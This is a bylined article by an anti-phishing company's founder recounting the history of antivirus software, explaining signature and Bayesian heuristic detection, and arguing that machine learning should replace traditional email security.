By Dave Baggett
Back during the Dot-com boom – or what many of us now refer to as the Dot-com bubble – of the mid '90s, many exciting advents were shaping the foundation of the modern web.
In 1993, the Mosaic browser made the Internet accessible to everyday users by making data “pretty” with color and simple graphics. This advent, along with the growing popularity of the home Windows and Mac, spurred rapid adoption of Internet service.
Like all great technologies, it wasn't long before systems were reverse engineered and exploited for either fun or nefarious reasons. During this new era of communication, as newer browsers like Netscape and then AOL became popular, so did malware and other scams.
Along with this explosion of web technology, software like McAfee and Norton became household names as “White Knight” protectors of computer systems from viruses that users had been led to believe were running rampant on the Web.
Interestingly, after all these years scams of all flavors are more pervasive than ever before. And not much has changed from how these traditional security systems protect machines to other functions like email.
A Quick History of Antivirus Software
Should you Google "first antivirus software", you’ll see a lot sites populate with the same answer appearing in the snippet identifying a then-25-year-old named Bernd Fix (seriously) as the creator of the first antivirus. Obnoxiously, it’s copy-pasted from whoever first wrote it, but it’s accurate, depending on how you frame “virus.”
You’ll go down a rabbit hole trying to verify the story without buying an e-book, but Fix was the first to document how he “fixed” the Vienna Virus – an unwanted program that essentially replicated itself from system to system.
This paved the way for the development of notable early systems like McAfee and Norton – after the Symantec acquisition of Peter Norton Computing – to come to the market. Over time, competition and demand would fuel growth for other products, some of which are still popular products today.
How These Systems Worked Then and Now
It’s one thing when a beloved product, be it Coca Cola or your grandma’s pie, still uses the same formula – nostalgia is fine for some things – but not so good in the case of computer software.
These traditional systems running on your computer, smartphone or server all use a heuristics system to find, and hopefully stop, any sort of bad code from executing on your system. In an incredibly basic sense, the process looks like this:
- The security software actively runs in the background of your system.
- When a new app or plugin runs, the system inspects code in the application.
- Tasked with looking for “this code will infect your computer,” the software either:
- Doesn’t see bad code and allows the software to run, or
- Sees “this code will infect your computer,” stops the software from running, and either deletes or quarantines the code.
What Is and What Isn’t Bad Code?
Typically, every single system relies on a database of “known attacks” to identify malicious code. This information is shared between different repositories all over the world and is periodically (usually daily) pulled by security software, much like blacklists used at a nightclub or suspect descriptions used by police.
Your malware protection, email security, and spam filtering all perform this process in real-time from the system where the software is installed. Provided that the attack has been foiled in the past (and updated), it’s part of the database, meaning the malicious code is recognized and contained before it causes any real trouble.
Of course, ask any bouncer or police officer and they’ll tell you new trouble makers pop up all the time.
The Bayesian Identification Method
Malicious code doesn’t always hide in plain sight. Imagine someone trying to sneak a chemical weapon through a secured gate – bringing the weapon in its entirety probably won’t work, but if each component is brought through separately, it may work.
For quite some time, a Bayesian inference method has been applied to heuristics in software for malware scanning and filtering of email domains. Alongside this conditional model of “if A then B" and "if B then C,” conditions are further simplified. This is done for a couple of reasons:
- By profiling applications or email headers using small bits of information as prerequisite to find malicious code or assumed intent, this speeds up the process.
- In many instances, dangerous elements are fragmented then compiled during runtime.
By applying this logic, elements of a previous attack are used to identify potential threats, making the heuristic process more effective. While this allows systems to quickly detect issues in real-time, problems persist with malware and BEC (business email compromise) tactics, like phishing.
The Flaws of Traditional Security Software
Many examples of when these methods fail to detect an issue, like in this recent instance of a zero-day flaw exploit in Adobe Flash, regularly appear in news headlines. Knowing that security must either have seen the attack or been able to draw an inference from an element of a previous malicious attempt, these attacks have a remarkably high rate of success.
The whole idea of real-time sounds great on paper, but it’s not quite enough. This especially holds true for email scams. When an email, attachment or some other element is already accessible to a user, it’s a bit too late. A scan running from the system (be it a physical machine or a hosted service, like an Office 365 app or even Gmail) presents a vulnerability in the chance that the attack is completely unique. The sad truth is that this happens all the time.
In even more insidious attempts, let’s say a user’s business email account is already compromised, unbeknownst to anyone. The attacker begins to prod others in the organization for information. There will be anomalies in language, syntax and morphology of message structure, but will anyone notice before it’s too late? One thing is for sure: a traditional security system won’t detect the subtle nuances.
A keen human eye can detect these innocuous changes, but only if the person is vigilant every time an email is read. Thankfully, machine learning and computer vision properly applied to scan elements before reaching other users can effectively uncover and stop scams before business is affected.
This is the next generation of computer security.
About Dave Baggett
Dave Baggett is CEO/Founder of Inky Anti-Phishing Software. As co-founder and COO of travel search provider ITA Software, Dave oversaw software development, operations, and customer relations, expanding the company to 500 employees. Google acquired ITA for $700M in April 2011.